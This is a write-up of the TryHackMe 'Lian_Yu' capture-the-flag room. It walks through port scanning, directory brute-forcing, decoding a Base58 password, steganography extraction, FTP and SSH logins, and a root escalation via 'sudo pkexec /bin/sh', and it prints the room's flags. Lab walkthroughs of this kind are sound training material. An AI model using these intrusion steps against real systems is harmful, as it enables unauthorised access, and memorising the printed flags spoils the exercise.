✍️
Writeups and Walkthroughs
HomeGitHubPortfolio Twitter/X Medium Cont@ct
  • ✍️Writeups and Walkthroughs
  • THM
    • Simple CTF
    • RootMe
    • Eternal Blue
    • Vulnversity
    • Pickle Rick
    • Brooklyn Nine Nine
    • Kenobi
    • Bounty Hacker
    • Overpass
    • LazyAdmin
    • Ignite
    • Bolt
    • Agent Sudo
    • Anonymous
    • Startup
    • Wgel
    • Lian_Yu
    • Blog
    • ColdBox
    • H4cked
    • Smag Grotto
    • Ice
    • Blaster
    • The Sticker Shop
    • 🔟OWASP
      • 1️⃣Injection
    • Active Directory Basics
    • Attacktive Directory
    • Post-Exploitation Basics
  • HackTheBox
    • Active
    • Devel
    • Delivery
    • Analytics
    • Bashed
    • Valentine
    • Sau
    • Sunday
    • Cap
    • Bizness
    • Chemistry %
  • Vulnhub
    • Brainpain (BoF)
  • DockerLabs
    • Trust
    • Upload
    • Vacaciones
  • DVWA
    • Install and configure DVWA
    • Command Injection
    • CSRF
    • File Inclusion
    • SQL Injection
    • SQLi Blind
  • Mutillidae II
    • Install & configure OWASP Mutillidae II
    • SQLi
      • SQLi Login Bypass
      • Extracting Data
      • Finding Number of Columns
      • Pivoting with SQL injection
    • Command Injection
      • Extracting User Accounts
      • Web Shell
    • IDOR & File Inclusion
      • Edit Another User's Profile
      • Extracting User Accounts
      • Extracting User Accounts with Local File Inclusion
      • Web Shell with Remote File Inclusion (RFI)
    • XSS
      • XSS Reflected
      • XSS Stored
      • XSS DOM-Based
  • Secure Bank
    • Install & configure Secure Bank
    • -----
      • SQLi Login Bypass
      • Extracting Data
      • Finding Number of Columns
      • Pivoting with SQL injection
    • -----
      • Extracting User Accounts
      • Web Shell
  • PortSwigger - Web Security Academy
    • Burp Suite Config
    • Information Disclosure
      • Information disclosure vulnerabilities
      • Common sources of information disclosure
        • Information disclosure in error messages
        • Information disclosure on debug page
        • Source code disclosure via backup files
        • Authentication bypass via information disclosure
        • Information disclosure in version control history
    • Essential skills
      • Obfuscating attacks using encodings
        • SQL injection with filter bypass via XML encoding
      • Using Burp Scanner
      • Identifying unknown vulnerabilities
    • Server-side vulnerabilities
      • Path traversal
        • File path traversal, simple case
      • Access control
        • Unprotected admin functionality
        • Unprotected admin functionality with unpredictable URL
        • User role controlled by request parameter
        • User ID controlled by request parameter, with unpredictable user IDs
        • User ID controlled by request parameter with password disclosure
      • Authentication
        • Username enumeration via different responses
        • 2FA simple bypass
      • Server-side request forgery (SSRF)
        • Basic SSRF against the local server
        • Basic SSRF against another back-end system
      • File upload vulnerabilities
        • Remote code execution via web shell upload
        • Web shell upload via Content-Type restriction bypass
      • OS Command Injection
        • OS command injection, simple case
      • SQL injection
        • SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
        • SQL injection vulnerability allowing login bypass
    • JWT Attacks
      • Json Web Tokens (JWT)
      • Exploiting JWT
        • JWT authentication bypass via unverified signature
        • JWT authentication bypass via flawed signature verification
        • JWT authentication bypass via weak signing key
        • To-Do
          • JWT authentication bypass via jwk header injection - %
          • JWT authentication bypass via jku header injection - %
          • JWT authentication bypass via kid header path traversal - %
    • API Testing
      • API Testing
        • Exploiting an API endpoint using documentation
        • Finding and exploiting an unused API endpoint
        • Exploiting a mass assignment vulnerability
      • Server-side parameter pollution
        • Exploiting server-side parameter pollution in a query string
    • Deserialization Insecure
      • Serialization vs Deserialization
        • Lab
        • Lab
      • Java Insecure Deserialization
        • Lab
        • Lab
      • PHP Insecure Deserialization
        • Lab
        • Lab
  • HomeMade Labs
    • Active Directory
      • AD Lab Setup
      • AD Enumeration
      • SMB Common Attacks
    • Pivoting
      • Pivoting Theory
      • Pivoting Guidelines
      • Lab (3 Targets)
    • Buffer Overflow (BoF)
      • BoF Theory
      • Brainpain (BoF Lab)
Powered by GitBook
On this page
  • Task 1 - Deploy the machine
  • Task 2 - Reconnaissance
  • Task 3 - Find the flags
  • 3.1 What is the Web Directory you found?
  • 3.2 What is the file name you found?
  • 3.3 - What is the FTP Password?
  • 3.4 - What is the file name with SSH password?
  • 3.5 - Find user.txt flag
  • 3.5 - Find root.txt flag
  1. THM

Lian_Yu

PreviousWgelNextBlog

Last updated 1 year ago

🔗

Task 1 - Deploy the machine

🎯 Target IP: 10.10.95.230

Create a directory for machine on the Desktop and a directory containing the scans with nmap.

Task 2 - Reconnaissance

su
echo "10.10.95.230 lian_yu.thm" >> /etc/hosts

mkdir thm/lian_yu
cd thm/lian_yu
mkdir {nmap,content,exploits,scripts}

# At the end of the room
# To clean up the last line from the /etc/hosts file
sed -i '$ d' /etc/hosts

I prefer to start recon by pinging the target, this allows us to check connectivity and get OS info.

ping -c 3 lian_yu.thm
PING lian_yu.thm (10.10.95.230) 56(84) bytes of data.
64 bytes from lian_yu.thm (10.10.95.230): icmp_seq=1 ttl=63 time=66.7 ms
64 bytes from lian_yu.thm (10.10.95.230): icmp_seq=2 ttl=63 time=62.1 ms
64 bytes from lian_yu.thm (10.10.95.230): icmp_seq=3 ttl=63 time=62.6 ms

Sending these three ICMP packets, we see that the Time To Live (TTL) is ~64 secs. this indicates that the target is a *nix, while Windows systems usually have a TTL of 128 secs.

Of course, start to check information scanning open ports:

nmap --open -p0- -n -Pn -vvv --min-rate 5000 lian_yu.thm -oG nmap/port_scan
PORT      STATE SERVICE REASON
21/tcp    open  ftp     syn-ack ttl 63
22/tcp    open  ssh     syn-ack ttl 63
80/tcp    open  http    syn-ack ttl 63
111/tcp   open  rpcbind syn-ack ttl 63
52286/tcp open  unknown syn-ack ttl 63
command
result

sudo

run as root

sC

run default scripts

sV

enumerate versions

A

aggressive mode

T4

run a bit faster

oN

output to file with nmap formatting

It looks like there are 5 open ports on the machine: 21,22,80,111,52286.

Now, we need to search which services are running on open ports:

nmap -p21,22,80,111,52286 -n -Pn -vvv -sCV --min-rate 5000 lian_yu.thm -oN nmap/open_port
PORT      STATE SERVICE REASON         VERSION
21/tcp    open  ftp     syn-ack ttl 63 vsftpd 3.0.2
22/tcp    open  ssh     syn-ack ttl 63 OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
| ssh-hostkey: 
|   1024 56:50:bd:11:ef:d4:ac:56:32:c3:ee:73:3e:de:87:f4 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAOZ67Cx0AtDwHfVa7iZw6O6htGa3GHwfRFSIUYW64PLpGRAdQ734COrod9T+pyjAdKscqLbUAM7xhSFpHFFGM7NuOwV+d35X8CTUM882eJX+t3vhEg9d7ckCzNuPnQSpeUpLuistGpaP0HqWTYjEncvDC0XMYByf7gbqWWU2pe9HAAAAFQDWZIJ944u1Lf3PqYCVsW48Gm9qCQAAAIBfWJeKF4FWRqZzPzquCMl6Zs/y8od6NhVfJyWfi8APYVzR0FR05YCdS2OY4C54/tI5s6i4Tfpah2k+fnkLzX74fONcAEqseZDOffn5bxS+nJtCWpahpMdkDzz692P6ffDjlSDLNAPn0mrJuUxBFw52Rv+hNBPR7SKclKOiZ86HnQAAAIAfWtiPHue0Q0J7pZbLeO8wZ9XNoxgSEPSNeTNixRorlfZBdclDDJcNfYkLXyvQEKq08S1rZ6eTqeWOD4zGLq9i1A+HxIfuxwoYp0zPodj3Hz0WwsIB2UzpyO4O0HiU6rvQbWnKmUaH2HbGtqJhYuPr76XxZtwK4qAeFKwyo87kzg==
|   2048 39:6f:3a:9c:b6:2d:ad:0c:d8:6d:be:77:13:07:25:d6 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRbgwcqyXJ24ulmT32kAKmPww+oXR6ZxoLeKrtdmyoRfhPTpCXdocoj0SqjsETI8H0pR0OVDQDMP6lnrL8zj2u1yFdp5/bDtgOnzfd+70Rul+G7Ch0uzextmZh7756/VrqKn+rdEVWTqqRkoUmI0T4eWxrOdN2vzERcvobqKP7BDUm/YiietIEK4VmRM84k9ebCyP67d7PSRCGVHS218Z56Z+EfuCAfvMe0hxtrbHlb+VYr1ACjUmGIPHyNeDf2430rgu5KdoeVrykrbn8J64c5wRZST7IHWoygv5j9ini+VzDhXal1H7l/HkQJKw9NSUJXOtLjWKlU4l+/xEkXPxZ
|   256 a6:69:96:d7:6d:61:27:96:7e:bb:9f:83:60:1b:52:12 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPfrP3xY5XGfIk2+e/xpHMTfLRyEjlDPMbA5FLuasDzVbI91sFHWxwY6fRD53n1eRITPYS1J6cBf+QRtxvjnqRg=
|   256 3f:43:76:75:a8:5a:a6:cd:33:b0:66:42:04:91:fe:a0 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDexCVa97Otgeg9fCD4RSvrNyB8JhRKfzBrzUMe3E/Fn
80/tcp    open  http    syn-ack ttl 63 Apache httpd
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Purgatory
|_http-server-header: Apache
111/tcp   open  rpcbind syn-ack ttl 63 2-4 (RPC #100000)
|_rpcinfo: ERROR: Script execution failed (use -d to debug)
52286/tcp open  status  syn-ack ttl 63 1 (RPC #100024)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Task 3 - Find the flags

3.1 What is the Web Directory you found?

Then we can start to see website (port 80):

We find this info in the footer of website:

Note: Hi Everyone, I am a huge fan to Arrowverse, I built this vm concept based on Arrow (first season) you will find a few things similar here and I posted this Content here just to entertain you, To complete this CTF it isn't mandatory to have knowledge on Arrrowverse series. I hope you will Enjoy the content and have fun :).

We continue exploring web source code to find eventual information disclosure.

No other informations, another good thing to do, is find hidden paths on website using gobuster

gobuster dir -u lian_yu.thm -w /usr/share/wordlists/dirb/common.txt

Very bad, we find only index page that we've just see.

We can try to use a bigger wordlist such as directory-list-2.3-medium.txt

gobuster dir -u lian_yu.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Excellent! We find a new web path: /island, search it!

Note this code word: vigilante.

We can try to retake another dirbuster search starting with island/ web path:

gobuster dir -u lian_yu.thm/island/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Then, we can answer at first question.

2100

3.2 What is the file name you found?

Explore /2100 web page:

Viewing source code:

we see this info:

you can avail your .ticket here but how?

Retaking another dirbuster search starting with 2100/ web path, we see that there're nothing, then we can try to custom dirbuster search using .ticket extension:

gobuster dir -u lian_yu.thm/island/2100/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .ticket

Wow, we've the path to the ticket which is the answer to this question as well.

green_arrow.ticket

3.3 - What is the FTP Password?

Open it we see this potential encrypted word, then we can use CyberChef to decrypt it.

After multiple trial and error attempts, we can determine that this is a Base58 encoding.

Remember that we've a potential username: 'vigilante', then we try to login with ftp:

Download these resources using mget * command.

There're three images with potential hidden info inside.

The 'Leave_me_alone.png' image is corrupt, seeing header we see that's not '.png':

xxd Leave_me_alone.png | head

then we can modify it using hexeditor and display it, getting information about psw:

hexeditor Leave_me_alone.png 

Perfect, we can try to extract info using steghide tool and psw retrevied few time ago:

steghide extract -sf aa.jpg
unzip ss.zip
#we find two files

The content of shado file can be more interesting!

!#th3h00d

3.4 - What is the file name with SSH password?

Trying the same FTP credentials we can't access with SSH.

Then, we've try to use the same username and brute force psw using Hydra, but it doesn't work.

First to brute force user and psw, we can try to re-access with FTP and check home folder of system users:

Very good, we find another user: slade, and probably ssh psw matched into shado file (M3tahuman).

Try it!

ssh slade@10.10.244.228

Well done!

shado

3.5 - Find user.txt flag

Using find command we can search quickly user flag and open it with cat:

find / -type f -iname "user.txt" 2>/dev/null
🚩User Flag (user.txt)

THM{P30P7E_K33P_53CRET5__C0MPUT3R5_D0N'T}

3.5 - Find root.txt flag

We can do sudo -l command to discover user's permissions.

Very good pkexec has root permission!

Run it to became root and find flag (how the last task):

sudo pkexec /bin/sh #privilege escalation

/bin/bash -i #spawn shell
find / -type f -iname "root.txt" 2>/dev/null #find root flag
cat /root/root.txt #see root.txt
🚩 Root Flag (root.txt)

THM{MY_W0RD_I5_MY_B0ND_IF_I_ACC3PT_YOUR_CONTRACT_THEN_IT_WILL_BE_COMPL3TED_OR_I'LL_BE_D34D}

Search on GTFOBins () and find our exploit:

https://gtfobins.github.io/
Lian_Yu
CyberChef
https://tryhackme.com/room/lianyu
https://gtfobins.github.io/gtfobins/pkexec/